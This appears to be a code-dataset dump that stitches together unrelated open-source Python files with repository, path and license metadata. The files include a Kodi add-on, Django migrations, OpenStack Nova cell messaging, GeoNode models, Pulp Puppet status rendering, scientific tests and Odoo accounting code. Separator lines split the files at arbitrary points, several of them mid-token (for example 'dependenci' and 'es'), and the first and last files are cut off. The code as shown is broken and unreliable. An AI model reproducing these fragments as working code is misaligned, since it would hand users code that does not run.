infolabels = { 'supports_meta' : 'true', 'video_type':video_type, 'name':str(infoLabels['title']), 'imdb_id':str(infoLabels['imdb_id']), 'season':str(season), 'episode':str(episode), 'year':str(infoLabels['year']) }
infoL={'Title': infoLabels['title'], 'Plot': infoLabels['plot'], 'Genre': infoLabels['genre']}
# play with bookmark
player = playbackengine.PlayWithoutQueueSupport(resolved_url=stream_url, addon_id=addon_id, video_type=video_type, title=str(infoLabels['title']),season=str(season), episode=str(episode), year=str(infoLabels['year']),img=img,infolabels=infoL, watchedCallbackwithParams=main.WatchedCallbackwithParams,imdb_id=imdb_id)
#WatchHistory
if selfAddon.getSetting("whistory") == "true":
wh.add_item(mname+' '+'[COLOR green]Oneclickwatch[/COLOR]', sys.argv[0]+sys.argv[2], infolabels=infolabels, img=img, fanart=fanart, is_folder=False)
player.KeepAlive()
return ok
except:
return ok
def VIDEOLINKST3(mname,murl):
sources=[]
main.GA("OneclickwatchM","Watched
|
agry/NGECore2
|
scripts/expertise/expertise_sp_cloaked_recovery_1.py
|
Python
|
lgpl-3.0
| 700
| 0.027143
|
import sys
def addAbilities(core, actor, player):
if actor.getLevel() >= 10:
actor.addAbility("sp_cloaked_recovery_0")
if
|
actor.getLevel() >= 28:
actor.addAbility("sp_cloaked_recovery_1")
if actor.getLevel() >= 54:
actor.addAbility("sp_cloaked_recovery_2")
if actor.getLevel() >= 70:
actor.addAbility("sp_cloaked_recovery_3")
if actor.getLevel() >= 86:
actor.addAbility("sp_cloaked_recovery_4")
return
def removeAbilities(core, actor, player):
actor.removeAbility("sp_cloaked_recovery_0")
actor
|
.removeAbility("sp_cloaked_recovery_1")
actor.removeAbility("sp_cloaked_recovery_2")
actor.removeAbility("sp_cloaked_recovery_3")
actor.removeAbility("sp_cloaked_recovery_4")
return
|
igemsoftware2017/USTC-Software-2017
|
biohub/forum/migrations/0005_auto_20171001_2105.py
|
Python
|
gpl-3.0
| 799
| 0.001252
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-01 13:05
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependenci
|
es = [
('contenttypes', '0002_remove_content_type_name'),
('forum', '0004_activity_brick_name'),
]
operations = [
migrations.AddField(
model_name='activity',
name='target_id',
field=models.PositiveSmallIntegerField(default=0, null=True),
),
migrations.AddFie
|
ld(
model_name='activity',
name='target_type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType'),
),
]
|
afrolov1/nova
|
nova/cells/messaging.py
|
Python
|
apache-2.0
| 84,342
| 0.000628
|
# Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.a
|
pache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to i
|
n writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Cell messaging module.
This module defines the different message types that are passed between
cells and the methods that they can call when the target cell has been
reached.
The interface into this module is the MessageRunner class.
"""
import sys
import traceback
from eventlet import queue
from oslo.config import cfg
from oslo import messaging
import six
from nova.cells import state as cells_state
from nova.cells import utils as cells_utils
from nova import compute
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import task_states
from nova.compute import vm_states
from nova.consoleauth import rpcapi as consoleauth_rpcapi
from nova import context
from nova.db import base
from nova import exception
from nova.network import model as network_model
from nova.objects import base as objects_base
from nova.objects import instance as instance_obj
from nova.objects import instance_fault as instance_fault_obj
from nova.openstack.common import excutils
from nova.openstack.common.gettextutils import _
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
from nova.openstack.common import uuidutils
from nova import rpc
from nova import utils
cell_messaging_opts = [
cfg.IntOpt('max_hop_count',
default=10,
help='Maximum number of hops for cells routing.'),
cfg.StrOpt('scheduler',
default='nova.cells.scheduler.CellsScheduler',
help='Cells scheduler to use')]
CONF = cfg.CONF
CONF.import_opt('name', 'nova.cells.opts', group='cells')
CONF.import_opt('call_timeout', 'nova.cells.opts', group='cells')
CONF.register_opts(cell_messaging_opts, group='cells')
LOG = logging.getLogger(__name__)
# Separator used between cell names for the 'full cell name' and routing
# path.
_PATH_CELL_SEP = cells_utils.PATH_CELL_SEP
def _reverse_path(path):
"""Reverse a path. Used for sending responses upstream."""
path_parts = path.split(_PATH_CELL_SEP)
path_parts.reverse()
return _PATH_CELL_SEP.join(path_parts)
def _response_cell_name_from_path(routing_path, neighbor_only=False):
"""Reverse the routing_path. If we only want to send to our parent,
set neighbor_only to True.
"""
path = _reverse_path(routing_path)
if not neighbor_only or len(path) == 1:
return path
return _PATH_CELL_SEP.join(path.split(_PATH_CELL_SEP)[:2])
#
# Message classes.
#
class _BaseMessage(object):
"""Base message class. It defines data that is passed with every
single message through every cell.
Messages are JSON-ified before sending and turned back into a
class instance when being received.
Every message has a unique ID. This is used to route responses
back to callers. In the future, this might be used to detect
receiving the same message more than once.
routing_path is updated on every hop through a cell. The current
cell name is appended to it (cells are separated by
_PATH_CELL_SEP ('!')). This is used to tell if we've reached the
target cell and also to determine the source of a message for
responses by reversing it.
hop_count is incremented and compared against max_hop_count. The
only current usefulness of this is to break out of a routing loop
if someone has a broken config.
fanout means to send to all nova-cells services running in a cell.
This is useful for capacity and capability broadcasting as well
as making sure responses get back to the nova-cells service that
is waiting.
"""
# Override message_type in a subclass
message_type = None
base_attrs_to_json = ['message_type',
'ctxt',
'method_name',
'method_kwargs',
'direction',
'need_response',
'fanout',
'uuid',
'routing_path',
'hop_count',
'max_hop_count']
def __init__(self, msg_runner, ctxt, method_name, method_kwargs,
direction, need_response=False, fanout=False, uuid=None,
routing_path=None, hop_count=0, max_hop_count=None,
**kwargs):
self.ctxt = ctxt
self.resp_queue = None
self.msg_runner = msg_runner
self.state_manager = msg_runner.state_manager
# Copy these.
self.base_attrs_to_json = self.base_attrs_to_json[:]
# Normally this would just be CONF.cells.name, but going through
# the msg_runner allows us to stub it more easily.
self.our_path_part = self.msg_runner.our_name
self.uuid = uuid
if self.uuid is None:
self.uuid = uuidutils.generate_uuid()
self.method_name = method_name
self.method_kwargs = method_kwargs
self.direction = direction
self.need_response = need_response
self.fanout = fanout
self.routing_path = routing_path
self.hop_count = hop_count
if max_hop_count is None:
max_hop_count = CONF.cells.max_hop_count
self.max_hop_count = max_hop_count
self.is_broadcast = False
self._append_hop()
# Each sub-class should set this when the message is inited
self.next_hops = []
self.resp_queue = None
self.serializer = objects_base.NovaObjectSerializer()
def __repr__(self):
_dict = self._to_dict()
_dict.pop('method_kwargs')
return "<%s: %s>" % (self.__class__.__name__, _dict)
def _append_hop(self):
"""Add our hop to the routing_path."""
routing_path = (self.routing_path and
self.routing_path + _PATH_CELL_SEP or '')
self.routing_path = routing_path + self.our_path_part
self.hop_count += 1
def _process_locally(self):
"""Its been determined that we should process this message in this
cell. Go through the MessageRunner to call the appropriate
method for this message. Catch the response and/or exception and
encode it within a Response instance. Return it so the caller
can potentially return it to another cell... or return it to
a caller waiting in this cell.
"""
try:
resp_value = self.msg_runner._process_message_locally(self)
failure = False
except Exception as exc:
resp_value = sys.exc_info()
failure = True
LOG.exception(_("Error processing message locally: %(exc)s"),
{'exc': exc})
return Response(self.routing_path, resp_value, failure)
def _setup_response_queue(self):
"""Shortcut to creating a response queue in the MessageRunner."""
self.resp_queue = self.msg_runner._setup_response_queue(self)
def _cleanup_response_queue(self):
"""Shortcut to deleting a response queue in the MessageRunner."""
if self.resp_queue:
self.msg_runner._cleanup_response_queue(self)
self.resp_queue = None
def _wait_for_json_responses(self, num_responses=1):
"""Wait for response(s) to be put into the eventlet queue. Since
|
NLHEALTHCARE/PYELT
|
tests/old/unit_tests_rob/_domain_rob_unittest.py
|
Python
|
gpl-3.0
| 2,194
| 0.001823
|
from pyelt.datalayers.database import Column, Columns
from pyelt.datalayers.dv import Sat, DvEntity, Link, Hub, HybridSat, LinkReference
clas
|
s Role:
pass
class Act:
pass
class Participation:
pass
class Zorgverlener(DvEntity, Role):
class Default(Sat):
zorgverlenernummer = Columns.TextColumn()
aanvangsdatum = Columns.DateColumn()
|
einddatum = Columns.DateColumn()
class Personalia(Sat):
achternaam = Columns.TextColumn()
tussenvoegsels = Columns.TextColumn()
voorletters = Columns.TextColumn()
voornaam = Columns.TextColumn()
bijnaam = Columns.TextColumn()
# wordt niet gebruikt in dwh2.0; hier gebruikt voor testen uitgevoerd in test03r_domain.py
class ContactGegevens(HybridSat):
class Types(HybridSat.Types):
telefoon = 'telefoon'
mobiel = 'mobiel'
mobiel2 = 'mobiel2'
telnummer = Columns.TextColumn()
datum = Columns.DateColumn()
landcode = Columns.TextColumn()
default = Default()
personalia = Personalia()
contactgegevens = ContactGegevens()
class Adres(DvEntity, Role):
class Default(Sat):
postcode = Columns.TextColumn()
huisnummer = Columns.IntColumn()
huisnummer_toevoeging = Columns.TextColumn()
straat = Columns.TextColumn()
plaats = Columns.TextColumn()
land = Columns.TextColumn()
default = Default()
class Zorginstelling(DvEntity, Role):
class Default(Sat):
zorginstellings_naam = Columns.TextColumn()
zorginstellings_nummer = Columns.TextColumn()
default = Default()
#Dit is een link:
class Zorgverlener_Zorginstelling_Link(Link, Participation):
zorgverlener = LinkReference(Zorgverlener)
zorginstelling = LinkReference(Zorginstelling)
# Dit is een HybridLink:
class Zorgverlener_Adres_Link(Link):
class Types:
post = 'post'
bezoek = 'bezoek'
woon = 'woon'
zorgverlener = LinkReference(Zorgverlener)
adres = LinkReference(Adres)
class Zorginstelling_Adres_Link(Link):
zorginstelling = LinkReference(Zorginstelling)
adres = LinkReference(Adres)
|
mishravikas/geonode-permissions
|
geonode/layers/models.py
|
Python
|
gpl-3.0
| 15,289
| 0.001243
|
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2012 OpenPlans
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
import uuid
import logging
from datetime import datetime
from django.db import models
from django.db.models import signals
from django.contrib.contenttypes.models import ContentType
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from geonode.base.models import ResourceBase, ResourceBaseManager, resourcebase_post_save
from geonode.people.utils import get_valid_user
from agon_ratings.models import OverallRating
logger = logging.getLogger("geonode.layers.models")
shp_exts = ['.shp', ]
csv_exts = ['.csv']
kml_exts = ['.kml']
vec_exts = shp_exts + csv_exts + kml_exts
cov_exts = ['.tif', '.tiff', '.geotiff', '.geotif']
class Style(models.Model):
"""Model for storing styles.
"""
name = models.CharField(_('style name'), max_length=255, unique=True)
sld_title = models.CharField(max_length=255, null=True, blank=True)
sld_body = models.TextField(_('sld text'), null=True, blank=True)
sld_version = models.CharField(
_('sld version'),
max_length=12,
null=True,
blank=True)
sld_url = models.CharField(_('sld url'), null=True, max_length=1000)
workspace = models.CharField(max_length=255, null=True, blank=True)
def __str__(self):
return "%s" % self.name.encode('utf-8')
class LayerManager(ResourceBaseManager):
def __init__(self):
models.Manager.__init__(self)
class Layer(ResourceBase):
"""
Layer (inherits ResourceBase fields)
"""
# internal fields
objects = LayerManager()
workspace = models.CharField(max_length=128)
store = models.CharField(max_length=128)
storeType = models.CharField(max_length=128)
name = models.CharField(max_length=128)
typename = models.CharField(max_length=128, null=True, blank=True)
default_style = models.ForeignKey(
Style,
related_name='layer_default_style',
null=True,
blank=True)
styles = models.ManyToManyField(Style, related_name='layer_styles')
charset = models.CharField(max_length=255, default='UTF-8')
upload_session = models.ForeignKey('UploadSession', blank=True, null=True)
service = models.ForeignKey(
'services.Service',
null=True,
blank=True,
related_name='layer_set')
def is_vector(self):
return self.storeType == 'dataStore'
@property
def display_type(self):
return ({
"dataStore": "Vector Data",
"coverageStore": "Raster Data",
}).get(self.storeType, "Data")
@property
def data_model(self):
if hasattr(self, 'modeldescription_set'):
lmd = self.modeldescription_set.all()
if lmd.exists():
return lmd.get().get_django_model()
return None
@property
def data_objects(self):
if self.data_model is not None:
return self.data_model.objects.using('datastore')
return None
@property
def service_type(self):
if self.storeType == 'coverageStore':
return "WCS"
if self.storeType == 'dataStore':
return "WFS"
@property
def ows_url(self):
if self.storeType == "remoteStore":
return self.service.base_url
else:
return settings.OGC_SERVER['default']['PUBLIC_LOCATION'] + "wms"
@property
def ptype(self):
if self.storeType == "remoteStore":
return self.service.ptype
else:
return "gxp_wmscsource"
@property
def service_typename(self):
if self.storeType == "remoteStore":
return "%s:%s" % (self.service.name, self.typename)
else:
return self.typename
def get_base_file(self):
"""Get the shp or geotiff file for this layer.
"""
# If there was no upload_session return None
if self.upload_session is None:
return None
base_exts = [x.replace('.', '') for x in cov_exts + vec_exts]
base_files = self.upload_session.layerfile_set.filter(
name__in=base_exts)
base_files_count = base_files.count()
# If there are no files in the upload_session return None
if base_files_count == 0:
return None
msg = 'There should only be one main file (.shp or .geotiff), found %s' % base_files_count
assert base_files_count == 1, msg
return base_files.get()
def get_absolute_url(self):
return reverse('layer_detail', args=(self.service_typename,))
def attribute_config(self):
# Get custom attribute sort order and labels if any
cfg = {}
visible_attributes = self.attribute_set.visible()
if (visible_attributes.count() > 0):
cfg["getFeatureInfo"] = {
"fields": [l.attribute for l in visible_attributes],
"propertyNames": dict([(l.attribute, l.attribute_label) for l in visible_attributes])
}
return cfg
|
def __str__(self):
if self.typename is not None:
return "%s Layer" % self.service_typename.encode('utf-8')
elif self.name is not None:
return "%s Layer" % self.name
|
else:
return "Unamed Layer"
class Meta:
# custom permissions,
# change and delete are standard in django
permissions = (
('view_layer','Can view'),
('change_layer_permissions',"Can change permissions"),
('edit_layer_style','can edit style'),
('edit_layer_metadata','can edit metadata'),
('edit_layer_data','can edit data'),
('download_layer','can download'),
('download_layer_metadata','can download metadata'))
# Permission Level Constants
# LEVEL_NONE inherited
LEVEL_READ = 'layer_readonly'
LEVEL_WRITE = 'layer_readwrite'
LEVEL_ADMIN = 'layer_admin'
def maps(self):
from geonode.maps.models import MapLayer
return MapLayer.objects.filter(name=self.typename)
@property
def class_name(self):
return self.__class__.__name__
class Layer_Styles(models.Model):
layer = models.ForeignKey(Layer)
style = models.ForeignKey(Style)
class UploadSession(models.Model):
"""Helper class to keep track of uploads.
"""
date = models.DateTimeField(auto_now=True)
user = models.ForeignKey(settings.AUTH_USER_MODEL)
processed = models.BooleanField(default=False)
error = models.TextField(blank=True, null=True)
traceback = models.TextField(blank=True, null=True)
def successful(self):
return self.processed and self.errors is None
class LayerFile(models.Model):
"""Helper class to store original files.
"""
upload_session = models.ForeignKey(UploadSession)
name = models.CharField(max_length=255)
base = models.BooleanField(default=False)
file = models.FileField(upload_to='layers', max_length=255)
class AttributeManager(models.Manager):
"""Helper class to access filtered attributes
"""
def visible(self):
return self.get_query_set().filter(
visible=True).order_by('display_order')
class Attribute(models.Model):
"""
Auxiliary model for storing layer attributes.
|
GutenkunstLab/SloppyCell
|
test/test_FixedPoints.py
|
Python
|
bsd-3-clause
| 3,610
| 0.006925
|
import unittest
import scipy
from SloppyCell.ReactionNetworks import *
lorenz = Network('lorenz')
lorenz.add_compartment('basic')
lorenz.add_species('x', 'basic', 0.5)
lorenz.add_species('y', 'basic', 0.5)
lorenz.add_species('z', 'basic', 0.5)
lorenz.add_parameter('sigma', 1.0)
lorenz.add_parameter('r', 2.0)
lorenz.add_parameter('b', 2.0)
lorenz.add_rate_rule('x', 'sigma*(y-x)')
lorenz.add_rate_rule('y', 'r*x - y - x*z')
lorenz.add_rate_rule('z', 'x*y - b*z')
class test_fixedpoints(unittest.TestCase):
def test_basic(self):
""" Test basic fixed-point finding """
net = lorenz.copy('test')
fp = Dynamics.dyn_var_fixed_point(net, dv0=[1,1,1], with_logs=False)
# This should find the fixed-point [sqrt(2), sqrt(2), 1]
self.assertAlmostEqual(fp[0], scipy.sqrt(2), 6, 'Failed on basic 1,0.')
self.assertAlmostEqual(fp[1], scipy.sqrt(2), 6, 'Failed on basic 1,1.')
self.assertAlmostEqual(fp[2], 1, 6, 'Failed on basic 1,2.')
fp = Dynamics.dyn_var_fixed_point(net, dv0=[-0.1,-0.1,-0.1],
|
with_logs=False)
# This should find the fixed-point [0, 0, 0]
self.assertAlmostEqual(fp[0], 0, 6, 'Failed on basic 2,0.')
self.assertAlmostEqual(fp[1], 0, 6, 'Failed on basic 2,1.')
self.assertAlmostEqu
|
al(fp[2], 0, 6, 'Failed on basic 2,2.')
def test_withlogs(self):
""" Test fixed-point finding with logs """
net = lorenz.copy('test')
fp = Dynamics.dyn_var_fixed_point(net, dv0=[1,1,1], with_logs=True)
# This should find the fixed-point [sqrt(2), sqrt(2), 1]
self.assertAlmostEqual(fp[0], scipy.sqrt(2), 6, 'Failed on logs 1,0.')
self.assertAlmostEqual(fp[1], scipy.sqrt(2), 6, 'Failed on logs 1,1.')
self.assertAlmostEqual(fp[2], 1, 6, 'Failed on logs 1,2.')
fp = Dynamics.dyn_var_fixed_point(net, dv0=[0.1,0.1,0.1],
with_logs=True)
# This should find the fixed-point [0, 0, 0]
self.assertAlmostEqual(fp[0], 0, 6, 'Failed on logs 2,0.')
self.assertAlmostEqual(fp[1], 0, 6, 'Failed on logs 2,1.')
self.assertAlmostEqual(fp[2], 0, 6, 'Failed on logs 2,2.')
def test_stability(self):
net = lorenz.copy('test')
# The sqrt(b*(r-1)), sqrt(b*(r-1)), r-1 fixed point is stable for r < rH
# Strogatz, Nonlinear Dynamics and Chaos (p. 316)
fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[1,1,1],
stability=True)
self.assertEqual(stable, -1, 'Failed to classify stable fixed point')
# (0,0,0) is a saddle here
fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[0.01,0.01,0.01],
stability=True)
self.assertEqual(stable, 0, 'Failed to classify saddle')
# (0,0,0) is a stable node here
net.set_var_ic('r', 0.5)
fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[0.1,0.1,0.1],
stability=True)
self.assertEqual(stable, -1, 'Failed to classify stable fixed point')
# Now make the far fixed point a saddle...
net.set_var_ic('sigma', 6.0)
net.set_var_ic('r', 25)
fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[10,10,10],
stability=True)
self.assertEqual(stable, 0, 'Failed to classify saddle')
suite = unittest.makeSuite(test_fixedpoints)
if __name__ == '__main__':
unittest.main()
|
chenbachar/HelpApp
|
src/versions/Iter2/helpapp-seproject/models/request.py
|
Python
|
mit
| 739
| 0.051421
|
#this model represents a request in our system
from google.appengine.ext import ndb
from datetime import datetime
from datetime import timedelta
class Request(ndb.Model):
city = ndb.StringProperty()
phone = ndb.String
|
Property()
date = ndb.DateTimeProperty()
description = ndb.StringProperty()
isCarNeeded = ndb.BooleanProperty()
@classmethod
def add(self,cit,phoneNum,desc,carNeeded):
req = Request()
req.city = cit
req.phone = phoneNum
req.description = desc
req.isCarNeeded = carNeeded
req.date = datetime.utcnow()
#converting UTC to GMT+2[Israel timezone]
#utc = datetime.utcnow()
#UTC_OFFSET = 3
#req.date = utc# - timedelta
|
(hours=UTC_OFFSET) #(UTC+3 = GMT+2)
req.put()
|
dkliban/pulp_puppet
|
pulp_puppet_extensions_admin/pulp_puppet/extensions/admin/repo/status.py
|
Python
|
gpl-2.0
| 12,614
| 0.002299
|
from gettext import gettext as _
import traceback
from pulp.client.commands.repo.sync_publish import StatusRenderer
from pulp.client.extensions.core import COLOR_FAILURE
from pulp_puppet.common import constants
from pulp_puppet.common.publish_progress import PublishProgressReport
from pulp_puppet.common.sync_progress import SyncProgressReport
class PuppetStatusRenderer(StatusRenderer):
def __init__(self, context):
super(PuppetStatusRenderer, self).__init__(context)
# Sync Steps
self.sync_metadata_last_state = constants.STATE_NOT_STARTED
self.sync_modules_last_state = constants.STATE_NOT_STARTED
# Publish Steps
self.publish_modules_last_state = constants.STATE_NOT_STARTED
self.publish_metadata_last_state = constants.STATE_NOT_STARTED
self.publish_http_last_state = constants.STATE_NOT_STARTED
self.publish_https_last_state = constants.STATE_NOT_STARTED
# UI Widgets
self.sync_metadata_bar = self.prompt.create_progress_bar()
self.sync_modules_bar = self.prompt.create_progress_bar()
self.publish_modules_bar = self.prompt.create_progress_bar()
self.publish_metadata_spinner = self.prompt.create_spinner()
def display_report(self, progress_report):
# Sync Steps
if constants.IMPORTER_ID in progress_report:
sync_report = SyncProgressReport.from_progress_dict(progress_report[constants.IMPORTER_ID])
self._display_sync_metadata_step(sync_report)
self._display_sync_modules_step(sync_report)
# Publish Steps
if constants.DISTRIBUTOR_ID in progress_report:
publish_report = PublishProgressReport.from_progress_dict(progress_report[constants.DISTRIBUTOR_ID])
self._display_publish_modules_step(publish_report)
self._display_publish_metadata_step(publish_report)
self._display_publish_http_https_step(publish_report)
def _display_sync_metadata_step(self, sync_report):
# Do nothing if it hasn't started yet or has already finished
if sync_report.metadata_state == constants.STATE_NOT_STARTED or \
self.sync_metadata_last_state in constants.COMPLETE_STATES:
return
# Only render this on the first non-not-started state
if self.sync_metadata_last_state == constants.STATE_NOT_STARTED:
self.prompt.write(_('Downloading metadata...'), tag='download-metadata')
# Same behavior for running or success
if sync_report.metadata_state in (constants.STATE_RUNNING, constants.STATE_SUCCESS):
items_done = sync_report.metadata_query_finished_count
items_total = sync_report.metadata_query_total_count
item_type = _('Metadata Query')
self._render_itemized_in_progress_state(items_done, items_total,
item_type, self.sync_metadata_bar, sync_report.metadata_state)
# The only state left to handle is if it failed
else:
self.prompt.render_failure_message(_('... failed'))
self.prompt.render_spacer()
self._render_error(sync_report.metadata_error_message,
sync_report.metadata_exception,
sync_report.metadata_traceback)
# Before finishing update the state
self.sync_metadata_last_state = sync_report.metadata_state
def _display_sync_modules_step(self, sync_report):
# Do nothing if it hasn't started yet or has already finished
if sync_report.modules_state == constants.STATE_NOT_STARTED or \
self.sync_modules_last_state in constants.COMPLETE_STATES:
return
# Only render this on the first non-not-started state
if self.sync_modules_last_state == constants.STATE_NOT_STARTED:
self.prompt.write(_('Downloading new modules...'), tag='downloading')
# Same behavior for running or success
if sync_report.modules_state in (constants.STATE_RUNNING, constants.STATE_SUCCESS):
items_done = sync_report.modules_finished_count + sync_report.modules_error_count
items_total = sync_report.modules_total_count
item_type = _('Module')
self._render_itemized_in_progress_state(items_done, items_total, item_type,
self.sync_modules_bar, sync_report.modules_state)
# The only state left to handle is if it failed
else:
self.prompt.render_failure_message(_('... failed'))
self.prompt.render_spacer()
self._render_error(sync_report.modules_error_message,
sync_report.modules_exception,
sync_report.modules_traceback)
# Regardless of success or failure, display any individual module errors
# if the new state is complete
if sync_report.mo
|
dules_state in constants.COMPLETE_STATES:
self._render_module_errors(sync_report.modules_individual_errors)
# Before finishing update the st
|
ate
self.sync_modules_last_state = sync_report.modules_state
def _display_publish_modules_step(self, publish_report):
# Do nothing if it hasn't started yet or has already finished
if publish_report.modules_state == constants.STATE_NOT_STARTED or \
self.publish_modules_last_state in constants.COMPLETE_STATES:
return
# Only render this on the first non-not-started state
if self.publish_modules_last_state == constants.STATE_NOT_STARTED:
self.prompt.write(_('Publishing modules...'), tag='publishing')
# Same behavior for running or success
if publish_report.modules_state in (constants.STATE_RUNNING, constants.STATE_SUCCESS):
items_done = publish_report.modules_finished_count + publish_report.modules_error_count
items_total = publish_report.modules_total_count
item_type = _('Module')
self._render_itemized_in_progress_state(items_done, items_total, item_type,
self.publish_modules_bar, publish_report.modules_state)
# The only state left to handle is if it failed
else:
self.prompt.render_failure_message(_('... failed'))
self.prompt.render_spacer()
self._render_error(publish_report.modules_error_message,
publish_report.modules_exception,
publish_report.modules_traceback)
# Regardless of success or failure, display any individual module errors
# if the new state is complete
if publish_report.modules_state in constants.COMPLETE_STATES:
self._render_module_errors(publish_report.modules_individual_errors)
# Before finishing update the state
self.publish_modules_last_state = publish_report.modules_state
def _display_publish_metadata_step(self, publish_report):
# Do nothing if it hasn't started yet or has already finished
if publish_report.metadata_state == constants.STATE_NOT_STARTED or \
self.publish_metadata_last_state in constants.COMPLETE_STATES:
return
# Only render this on the first non-not-started state
if self.publish_metadata_last_state == constants.STATE_NOT_STARTED:
self.prompt.write(_('Generating repository metadata...'), tag='generating')
if publish_report.metadata_state == constants.STATE_RUNNING:
self.publish_metadata_spinner.next()
elif publish_report.metadata_state == constants.STATE_SUCCESS:
self.publish_metadata_spinner.next(finished=True)
self.prompt.write(_('... completed'), tag='completed')
self.prompt.render_spacer()
elif publish_report.metadata_state == constants.STATE_FAILED:
self.publish_metadata_spinner.next(finished=True)
self.prompt.render_failure_message(_('... failed'))
self.prompt.render_spacer()
self._render_error(publish_report.modules_error_message,
publish
|
yaniv14/OpenCommunity
|
src/communities/migrations/0014_auto_20160804_1517.py
|
Python
|
bsd-3-clause
| 603
| 0.001658
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2016-08-04 12:17
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('communities', '0013_
|
auto_20160801_1241'),
]
operations = [
migrations.AlterField(
mode
|
l_name='groupuser',
name='group',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='group_users', to='communities.CommunityGroup', verbose_name='Group'),
),
]
|
justinwp/croplands
|
croplands_api/views/api/users.py
|
Python
|
mit
| 2,237
| 0.002235
|
from croplands_api import api
from croplands_api.models import User
from croplands_api.views.api.processors im
|
port api_roles, remove_relations
from croplands_api.exceptions import Unauthorized
from croplands_api.auth import is_anonymous, current_user, verify_role
def can_edit_the_user(data=None, **kwargs):
"""
Determines if t
|
he current user can modify the specified user account.
:param data:
:param kwargs:
:return: None
"""
if is_anonymous():
raise Unauthorized()
if hasattr(current_user, 'id') and current_user.id == int(kwargs['instance_id']):
return
if verify_role('admin'):
return
raise Unauthorized()
def check_for_me(data=None, **kwargs):
"""
:param data:
:param kwargs:
:return: None
"""
if is_anonymous():
raise Unauthorized(description="Must send token.")
if kwargs['instance_id'] == 'me':
kwargs['instance_id'] = current_user.id
def ignore_read_only_fields(data=None, **kwargs):
"""
Removes the read only field from the data. Alternative could be to raise a 409 conflict.
:param data: json
:param kwargs:
:return: None
"""
read_only = ['password', 'attempts', 'email_verification_token', 'score', 'id', 'status']
for field in read_only:
if field in data:
del data[field]
# abort(409)
def create(app):
api.create_api(User,
app=app,
collection_name='users',
methods=['GET', 'PATCH'],
results_per_page=50,
preprocessors={
'GET_SINGLE': [check_for_me],
'PATCH_SINGLE': [can_edit_the_user, remove_relations,
ignore_read_only_fields],
'PATCH_MANY': [api_roles('admin'), remove_relations,
ignore_read_only_fields],
'DELETE': [api_roles('admin'), ]
},
postprocessors={
},
exclude_columns=['email', 'password', 'attempts',
'email_verification_token', 'status']
)
|
addition-it-solutions/project-all
|
addons/account_bank_statement_extensions/account_bank_statement.py
|
Python
|
agpl-3.0
| 6,685
| 0.005984
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
#
# Copyright (c) 2011 Noviat nv/sa (www.noviat.be). All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
import openerp.addons.decimal_precision as dp
from openerp.tools.translate import _
from openerp.exceptions import UserError
class account_bank_statement(osv.osv):
_inherit = 'account.bank.statement'
def write(self, cr, uid, ids, vals, context=None):
if context is None:
context = {}
# bypass obsolete statement line resequencing
if vals.get('line_ids', False) or context.get('ebanking_import', False):
res = super(osv.osv, self).write(cr, uid, ids, vals, context=context)
else:
res = super(account_bank_statement, self).write(cr, uid, ids, vals, context=context)
return res
def button_confirm_bank(self, cr, uid, ids, context=None):
bank_statement_line_obj = self.pool.get('account.bank.statement.line')
super(account_bank_statement, self).button_confirm_bank(cr, uid, ids, context=context)
for st in self.browse(cr, uid, ids, context=context):
if st.line_ids:
line_ids = [l.id for l in st.line_ids]
cr.execute("UPDATE account_bank_statement_line \
SET state='confirm' WHERE id in %s ",
(tuple(line_ids),))
|
bank_statement_line_obj.invalidate_cache(cr, uid, ['state'], line_ids, context=context)
return True
def button_cancel(self, cr, uid, ids, context=None):
bank_statement_line_obj = self.pool.get('account.bank.statement.line')
super(account_bank_statement, self).button_cancel(cr, uid, ids, context=context)
for st in self.browse(cr, uid, ids, context=context):
if st.line_ids:
|
line_ids = [l.id for l in st.line_ids]
cr.execute("UPDATE account_bank_statement_line \
SET state='draft' WHERE id in %s ",
(tuple(line_ids),))
bank_statement_line_obj.invalidate_cache(cr, uid, ['state'], line_ids, context=context)
return True
class account_bank_statement_line_global(osv.osv):
_name = 'account.bank.statement.line.global'
_description = 'Batch Payment Info'
_columns = {
